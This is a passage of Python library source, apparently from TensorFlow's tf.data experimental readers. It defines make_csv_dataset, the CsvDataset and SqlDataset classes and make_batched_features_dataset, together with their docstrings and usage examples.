correspond to header lines with column names, and should not be included
in the data.
num_epochs: An int specifying the number of times this dataset is repeated.
If None, cycles through the dataset forever.
shuffle: A bool that indicates whether the input should be shuffled.
shuffle_buffer_size: Buffer size to use for shuffling. A large buffer size
ensures better shuffling, but increases memory usage and startup time.
shuffle_seed: Randomization seed to use for shuffling.
prefetch_buffer_size: An int specifying the number of feature
batches to prefetch for performance improvement. Recommended value is the
number of batches consumed per training step. Defaults to auto-tune.
num_parallel_reads: Number of threads used to read CSV records from files.
If >1, the results will be interleaved.
sloppy: If `True`, reading performance will be improved at
the cost of non-deterministic ordering. If `False`, the order of elements
produced is deterministic prior to shuffling (elements are still
randomized if `shuffle=True`. Note that if the seed is set, then order
of elements after shuffling is deterministic). Defaults to `False`.
num_rows_for_inference: Number of rows of a file to use for type inference
if record_defaults is not provided. If None, reads all the rows of all
the files. Defaults to 100.
compression_type: (Optional.) A `tf.string` scalar evaluating to one of
`""` (no compression), `"ZLIB"`, or `"GZIP"`. Defaults to no compression.
ignore_errors: (Optional.) If `True`, ignores errors with CSV file parsing,
such as malformed data or empty lines, and moves on to the next valid
CSV record. Otherwise, the dataset raises an error and stops processing
when encountering any invalid records. Defaults to `False`.
Returns:
A dataset, where each element is a (features, labels) tuple that corresponds
to a batch of `batch_size` CSV rows. The features dictionary maps feature
column names to `Tensor`s containing the corresponding column data, and
labels is a `Tensor` containing the column data for the label column
specified by `label_name`.
Raises:
ValueError: If any of the arguments is malformed.
"""
# Create dataset of all matching filenames
filenames = _get_file_names(file_pattern, False)
dataset = dataset_ops.Dataset.from_tensor_slices(filenames)
if shuffle:
dataset = dataset.shuffle(len(filenames), shuffle_seed)
# Clean arguments; figure out column names and defaults
if column_names is None:
if not header:
raise ValueError("Cannot infer column names without a header line.")
# If column names are not provided, infer from the header lines
column_names = _infer_column_names(filenames, field_delim, use_quote_delim)
if len(column_names) != len(set(column_names)):
raise ValueError("Cannot have duplicate column names.")
if select_columns is not None:
select_columns = _get_sorted_col_indices(select_columns, column_names)
if column_defaults is not None:
column_defaults = [
constant_op.constant([], dtype=x) if x in _ACCEPTABLE_CSV_TYPES else x
for x in column_defaults
]
else:
# If column defaults are not provided, infer from records at graph
# construction time
column_defaults = _infer_column_defaults(
filenames, len(column_names), field_delim, use_quote_delim, na_value,
header, num_rows_for_inference, select_columns)
if select_columns is not None and len(column_defaults) != len(select_columns):
raise ValueError(
"If specified, column_defaults and select_columns must have same "
"length."
)
if select_columns is not None and len(column_names) > len(select_columns):
# Pick the relevant subset of column names
column_names = [column_names[i] for i in select_columns]
if label_name is not None and label_name not in column_names:
raise ValueError("`label_name` provided must be one of the columns.")
def filename_to_dataset(filename):
dataset = CsvDataset(
filename,
record_defaults=column_defaults,
field_delim=field_delim,
use_quote_delim=use_quote_delim,
na_value=na_value,
select_cols=select_columns,
header=header,
compression_type=compression_type
)
if ignore_errors:
dataset = dataset.apply(error_ops.ignore_errors())
return dataset
def map_fn(*columns):
"""Organizes columns into a features dictionary.
Args:
*columns: list of `Tensor`s corresponding to one csv record.
Returns:
An OrderedDict of feature names to values for that particular record. If
label_name is provided, extracts the label feature to be returned as the
second element of the tuple.
"""
features = collections.OrderedDict(zip(column_names, columns))
if label_name is not None:
label = features.pop(label_name)
return features, label
return features
# Read files sequentially (if num_parallel_reads=1) or in parallel
dataset = dataset.apply(
interleave_ops.parallel_interleave(
filename_to_dataset, cycle_length=num_parallel_reads, sloppy=sloppy))
dataset = _maybe_shuffle_and_repeat(
dataset, num_epochs, shuffle, shuffle_buffer_size, shuffle_seed)
# Apply batch before map for perf, because map has high overhead relative
# to the size of the computation in each map.
# NOTE(mrry): We set `drop_remainder=True` when `num_epochs is None` to
# improve the shape inference, because it makes the batch dimension static.
# It is safe to do this because in that case we are repeating the input
# indefinitely, and all batches will be full-sized.
dataset = dataset.batch(batch_size=batch_size,
drop_remainder=num_epochs is None)
dataset = dataset_ops.MapDataset(
dataset, map_fn, use_inter_op_parallelism=False)
dataset = dataset.prefetch(prefetch_buffer_size)
return dataset
@tf_export(v1=["data.experimental.make_csv_dataset"])
def make_csv_dataset_v1(
file_pattern,
batch_size,
column_names=None,
column_defaults=None,
label_name=None,
select_columns=None,
field_delim=",",
use_quote_delim=True,
na_value="",
header=True,
num_epochs=None,
shuffle=True,
shuffle_buffer_size=10000,
shuffle_seed=None,
prefetch_buffer_size=dataset_ops.AUTOTUNE,
num_parallel_reads=1,
sloppy=False,
num_rows_for_inference=100,
compression_type=None,
ignore_errors=False,
): # pylint: disable=missing-docstring
return dataset_ops.DatasetV1Adapter(make_csv_dataset_v2(
file_pattern, batch_size, column_names, column_defaults, label_name,
select_columns, field_delim, use_quote_delim, na_value, header,
num_epochs, shuffle, shuffle_buffer_size, shuffle_seed,
prefetch_buffer_size, num_parallel_reads, sloppy, num_rows_for_inference,
compression_type, ignore_errors))
make_csv_dataset_v1.__doc__ = make_csv_dataset_v2.__doc__
_DEFAULT_READER_BUFFER_SIZE_BYTES = 4 * 1024 * 1024 # 4 MB
@tf_export("data.experimental.CsvDataset", v1=[])
class CsvDatasetV2(dataset_ops.DatasetSource):
"""A Dataset comprising lines from one or more CSV files."""
def __init__(self,
filenames,
record_defaults,
compression_type=None,
buffer_size=None,
header=False,
field_delim=",",
use_quote_delim=True,
na_value="",
select_cols=None):
"""Creates a `CsvDataset` by reading and decoding CSV files.
The elements of this dataset correspond to records from the file(s).
RFC 4180 format is expected for CSV files
(https://tools.ietf.org/html/rfc4180)
Note that we allow leading and trailing spaces with int or float field.
For example, suppose we have a file 'my_file0.csv' with four CSV columns of
different data types:
```
abcdefg,4.28E10,5.55E6,12
hijklmn,-5.3E14,,2
```
We can construct a CsvDataset from it as follows:
```python
tf.compat.v1.enable_eager_execution()
dataset = tf.data.experimental.CsvDataset(
"my_file*.csv",
[tf.float32, # Required field, use dtype or empty tensor
tf.constant([0.0], dtype=tf.float32), # Optional field, default to 0.0
tf.int32, # Required field, use dtype or empty tensor
],
select_cols=[1,2,3] # Only parse last three columns
)
```
The expected output of its iterations is:
```python
for element in dataset:
print(element)
>> (4.28e10, 5.55e6, 12)
>> (-5.3e14, 0.0, 2)
```
Args:
filenames: A `tf.string` tensor containing one or more filenames.
record_defaults: A list of default values for the CSV fields. Each item in
the list is either a valid CSV `DType` (float32, float64, int32, int64,
string), or a `Tensor` object with one of the above types. One per
column of CSV data, with either a scalar `Tensor` default value for the
column if it is optional, or `DType` or empty `Tensor` if required. If
both this and `select_columns` are specified, these must have the same
lengths, and `column_defaults` is assumed to be sorted in order of
increasing column index.
compression_type: (Optional.) A `tf.string` scalar evaluating to one of
`""` (no compression), `"ZLIB"`, or `"GZIP"`. Defaults to no
compression.
buffer_size: (Optional.) A `tf.int64` scalar denoting the number of bytes
to buffer while reading files. Defaults to 4MB.
header: (Optional.) A `tf.bool` scalar indicating whether the CSV file(s)
have header line(s) that should be skipped when parsing. Defaults to
`False`.
field_delim: (Optional.) A `tf.string` scalar containing the delimiter
character that separates fields in a record. Defaults to `","`.
use_quote_delim: (Optional.) A `tf.bool` scalar. If `False`, treats
double quotation marks as regular characters inside of string fields
(ignoring RFC 4180, Section 2, Bullet 5). Defaults to `True`.
na_value: (Optional.) A `tf.string` scalar indicating a value that will
be treated as NA/NaN.
select_cols: (Optional.) A sorted list of column indices to select from
the input data. If specified, only this subset of columns will be
parsed. Defaults to parsing all columns.
"""
self._filenames = ops.convert_to_tensor(
filenames, dtype=dtypes.string, name="filenames")
self._compression_type = convert.optional_param_to_tensor(
"compression_type",
compression_type,
argument_default="",
argument_dtype=dtypes.string)
record_defaults = [
constant_op.constant([], dtype=x) if x in _ACCEPTABLE_CSV_TYPES else x
for x in record_defaults
]
self._record_defaults = ops.convert_n_to_tensor(
record_defaults, name="record_defaults")
self._buffer_size = convert.optional_param_to_tensor(
"buffer_size", buffer_size, _DEFAULT_READER_BUFFER_SIZE_BYTES)
self._header = ops.convert_to_tensor(
header, dtype=dtypes.bool, name="header")
self._field_delim = ops.convert_to_tensor(
field_delim, dtype=dtypes.string, name="field_delim")
self._use_quote_delim = ops.convert_to_tensor(
use_quote_delim, dtype=dtypes.bool, name="use_quote_delim")
self._na_value = ops.convert_to_tensor(
na_value, dtype=dtypes.string, name="na_value")
self._select_cols = convert.optional_param_to_tensor(
"select_cols",
select_cols,
argument_default=[],
argument_dtype=dtypes.int64,
)
self._structure = structure.NestedStructure(
tuple(structure.TensorStructure(d.dtype, [])
for d in self._record_defaults))
variant_tensor = gen_experimental_dataset_ops.experimental_csv_dataset(
filenames=self._filenames,
record_defaults=self._record_defaults,
buffer_size=self._buffer_size,
header=self._header,
output_shapes=self._structure._flat_shapes, # pylint: disable=protected-access
field_delim=self._field_delim,
use_quote_delim=self._use_quote_delim,
na_value=self._na_value,
select_cols=self._select_cols,
compression_type=self._compression_type)
super(CsvDatasetV2, self).__init__(variant_tensor)
@property
def _element_structure(self):
return self._structure
@tf_export(v1=["data.experimental.CsvDataset"])
class CsvDatasetV1(dataset_ops.DatasetV1Adapter):
"""A Dataset comprising lines from one or more CSV files."""
@functools.wraps(CsvDatasetV2.__init__)
def __init__(self,
filenames,
record_defaults,
compression_type=None,
buffer_size=None,
header=False,
field_delim=",",
use_quote_delim=True,
na_value="",
select_cols=None):
wrapped = CsvDatasetV2(filenames, record_defaults, compression_type,
buffer_size, header, field_delim, use_quote_delim,
na_value, select_cols)
super(CsvDatasetV1, self).__init__(wrapped)
@tf_export("data.experimental.make_batched_features_dataset", v1=[])
def make_batched_features_dataset_v2(file_pattern,
batch_size,
features,
reader=core_readers.TFRecordDataset,
label_key=None,
reader_args=None,
num_epochs=None,
shuffle=True,
shuffle_buffer_size=10000,
shuffle_seed=None,
prefetch_buffer_size=dataset_ops.AUTOTUNE,
reader_num_threads=1,
parser_num_threads=2,
sloppy_ordering=False,
drop_final_batch=False):
"""Returns a `Dataset` of feature dictionaries from `Example` protos.
If label_key argument is provided, returns a `Dataset` of tuple
comprising of feature dictionaries and label.
Example:
```
serialized_examples = [
features {
feature { key: "age" value { int64_list { value: [ 0 ] } } }
feature { key: "gender" value { bytes_list { value: [ "f" ] } } }
feature { key: "kws" value { bytes_list { value: [ "code", "art" ] } } }
},
features {
feature { key: "age" value { int64_list { value: [] } } }
feature { key: "gender" value { bytes_list { value: [ "f" ] } } }
feature { key: "kws" value { bytes_list { value: [ "sports" ] } } }
}
]
```
We can use arguments:
```
features: {
"age": FixedLenFeature([], dtype=tf.int64, default_value=-1),
"gender": FixedLenFeature([], dtype=tf.string),
"kws": VarLenFeature(dtype=tf.string),
}
```
And the expected output is:
```python
{
"age": [[0], [-1]],
"gender": [["f"], ["f"]],
"kws": SparseTensor(
indices=[[0, 0], [0, 1], [1, 0]],
values=["code", "art", "sports"]
dense_shape=[2, 2]),
}
```
Args:
file_pattern: List of files or patterns of file paths containing
`Example` records. See `tf.io.gfile.glob` for pattern rules.
batch_size: An int representing the number of records to combine
in a single batch.
features: A `dict` mapping feature keys to `FixedLenFeature` or
`VarLenFeature` values. See `tf.io.parse_example`.
reader: A function or class that can be
called with a `filenames` tensor and (optional) `reader_args` and returns
a `Dataset` of `Example` tensors. Defaults to `tf.data.TFRecordDataset`.
label_key: (Optional) A string corresponding to the key labels are stored in
`tf.Examples`. If provided, it must be one of the `features` key,
otherwise results in `ValueError`.
reader_args: Additional arguments to pass to the reader class.
num_epochs: Integer specifying the number of times to read through the
dataset. If None, cycles through the dataset forever. Defaults to `None`.
shuffle: A boolean, indicates whether the input should be shuffled. Defaults
to `True`.
shuffle_buffer_size: Buffer size of the ShuffleDataset. A large capacity
ensures better shuffling but would increase memory usage and startup time.
shuffle_seed: Randomization seed to use for shuffling.
prefetch_buffer_size: Number of feature batches to prefetch in order to
improve performance. Recommended value is the number of batches consumed
per training step. Defaults to auto-tune.
reader_num_threads: Number of threads used to read `Example` records. If >1,
the results will be interleaved.
parser_num_threads: Number of threads to use for parsing `Example` tensors
into a dictionary of `Feature` tensors.
sloppy_ordering: If `True`, reading performance will be improved at
the cost of non-deterministic ordering. If `False`, the order of elements
produced is deterministic prior to shuffling (elements are still
randomized if `shuffle=True`. Note that if the seed is set, then order
of elements after shuffling is deterministic). Defaults to `False`.
drop_final_batch: If `True`, and the batch size does not evenly divide the
input dataset size, the final smaller batch will be dropped. Defaults to
`False`.
Returns:
A dataset of `dict` elements, (or a tuple of `dict` elements and label).
Each `dict` maps feature keys to `Tensor` or `SparseTensor` objects.
Raises:
TypeError: If `reader` is a `tf.compat.v1.ReaderBase` subclass.
ValueError: If `label_key` is not one of the `features` keys.
"""
# Create dataset of all matching filenames
dataset = dataset_ops.Dataset.list_files(
file_pattern, shuffle=shuffle, seed=shuffle_seed)
if isinstance(reader, type) and issubclass(reader, io_ops.ReaderBase):
raise TypeError("The `reader` argument must return a `Dataset` object. "
"`tf.ReaderBase` subclasses are not supported. For "
"example, pass `tf.data.TFRecordDataset` instead of "
"`tf.TFRecordReader`.")
# Read `Example` records from files as tensor objects.
if reader_args is None:
reader_args = []
# Read files sequentially (if reader_num_threads=1) or in parallel
dataset = dataset.apply(
interleave_ops.parallel_interleave(
lambda filename: reader(filename, *reader_args),
cycle_length=reader_num_threads,
sloppy=sloppy_ordering))
# Extract values if the `Example` tensors are stored as key-value tuples.
if dataset_ops.get_legacy_output_types(dataset) == (
dtypes.string, dtypes.string):
dataset = dataset_ops.MapDataset(
dataset, lambda _, v: v, use_inter_op_parallelism=False)
# Apply dataset repeat and shuffle transformations.
dataset = _maybe_shuffle_and_repeat(
dataset, num_epochs, shuffle, shuffle_buffer_size, shuffle_seed)
# NOTE(mrry): We set `drop_remainder=True` when `num_epochs is None` to
# improve the shape inference, because it makes the batch dimension static.
# It is safe to do this because in that case we are repeating the input
# indefinitely, and all batches will be full-sized.
dataset = dataset.batch(
batch_size, drop_remainder=drop_final_batch or num_epochs is None)
# Parse `Example` tensors to a dictionary of `Feature` tensors.
dataset = dataset.apply(
parsing_ops.parse_example_dataset(
features, num_parallel_calls=parser_num_threads))
if label_key:
if label_key not in features:
raise ValueError(
"The `label_key` provided (%r) must be one of the `features` keys." %
label_key)
dataset = dataset.map(lambda x: (x, x.pop(label_key)))
dataset = dataset.prefetch(prefetch_buffer_size)
return dataset
@tf_export(v1=["data.experimental.make_batched_features_dataset"])
def make_batched_features_dataset_v1(file_pattern, # pylint: disable=missing-docstring
batch_size,
features,
reader=core_readers.TFRecordDataset,
label_key=None,
reader_args=None,
num_epochs=None,
shuffle=True,
shuffle_buffer_size=10000,
shuffle_seed=None,
prefetch_buffer_size=dataset_ops.AUTOTUNE,
reader_num_threads=1,
parser_num_threads=2,
sloppy_ordering=False,
drop_final_batch=False):
return dataset_ops.DatasetV1Adapter(make_batched_features_dataset_v2(
file_pattern, batch_size, features, reader, label_key, reader_args,
num_epochs, shuffle, shuffle_buffer_size, shuffle_seed,
prefetch_buffer_size, reader_num_threads, parser_num_threads,
sloppy_ordering, drop_final_batch))
make_batched_features_dataset_v2.__doc__ = (
make_batched_features_dataset_v1.__doc__)
def _get_file_names(file_pattern, shuffle):
"""Parse list of file names from pattern, optionally shuffled.
Args:
file_pattern: File glob pattern, or list of glob patterns.
shuffle: Whether to shuffle the order of file names.
Returns:
List of file names matching `file_pattern`.
Raises:
ValueError: If `file_pattern` is empty, or pattern matches no files.
"""
if isinstance(file_pattern, list):
if not file_pattern:
raise ValueError("File pattern is empty.")
file_names = []
for entry in file_pattern:
file_names.extend(gfile.Glob(entry))
else:
file_names = list(gfile.Glob(file_pattern))
if not file_names:
raise ValueError("No files match %s." % file_pattern)
# Sort files so it will be deterministic for unit tests.
if not shuffle:
file_names = sorted(file_names)
return file_names
@tf_export("data.experimental.SqlDataset", v1=[])
class SqlDatasetV2(dataset_ops.DatasetSource):
"""A `Dataset` consisting of the results from a SQL query."""
def __init__(self, driver_name, data_source_name, query, output_types):
"""Creates a `SqlDataset`.
`SqlDataset` allows a user to read data from the result set of a SQL query.
For example:
```python
tf.compat.v1.enable_eager_execution()
dataset = tf.data.experimental.SqlDataset("sqlite", "/foo/bar.sqlite3",
"SELECT name, age FROM people",
(tf.string, tf.int32))
# Prints the rows of the result set of the above query.
for element in dataset:
print(element)
```
Args:
driver_name: A 0-D `tf.string` tensor containing the database type.
Currently, the only supported value is 'sqlite'.
data_source_name: A 0-D `tf.string` tensor containing a connection string
to connect to the database.
query: A 0-D `tf.string` tensor containing the SQL query to execute.
output_types: A tuple of `tf.DType` objects representing the types of the
columns returned by `query`.
"""
self._driver_name = ops.convert_to_tensor(
driver_name, dtype=dtypes.string, name="driver_name")
self._data_source_name = ops.convert_to_tensor(
data_source_name, dtype=dtypes.string, name="data_source_name")
self._query = ops.convert_to_tensor(
query, dtype=dtypes.string, name="query")
self._structure = structure.NestedStructure(
nest.map_structure(
lambda dtype: structure.TensorStructure(dtype, []), output_types))
variant_tensor = gen_experimental_dataset_ops.experimental_sql_dataset(
self._driver_name, self._data_source_name, self._query,
**dataset_ops.flat_structure(self))
super(SqlDatasetV2, self).__init__(variant_tensor)
@property
def _element_structure(self):
return self._structure
@tf_export(v1=["data.experimental.SqlDataset"])
class SqlDatasetV1(dataset_ops.DatasetV1Adapter):
"""A `Dataset` consisting of the results from a SQL query."""
@functools.wraps(SqlDatasetV2.__init__)
def __init__(self, driver_name, data_source_name, query, output_types):
wrapped = SqlDatasetV2(driver_name, data_source_name, query, output_types)
super(SqlDatasetV1, self).__init__(wrapped)
# TODO(b/119044825): Until all `tf.data` unit tests are converted to V2, keep
# these aliases in place.
CsvDataset = CsvDatasetV1
SqlDataset = SqlDatasetV1
make_batched_features_dataset = make_batched_features_dataset_v1
make_csv_dataset = make_csv_dataset_v1
| 41.698381 | 87 | 0.688844 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.